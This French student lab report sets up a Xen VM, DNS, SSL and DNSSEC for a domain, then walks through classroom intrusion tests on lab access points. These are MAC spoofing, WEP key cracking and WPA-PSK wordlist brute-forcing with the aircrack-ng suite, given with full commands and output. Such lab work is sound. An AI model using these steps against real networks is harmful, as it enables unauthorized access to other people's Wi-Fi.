[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
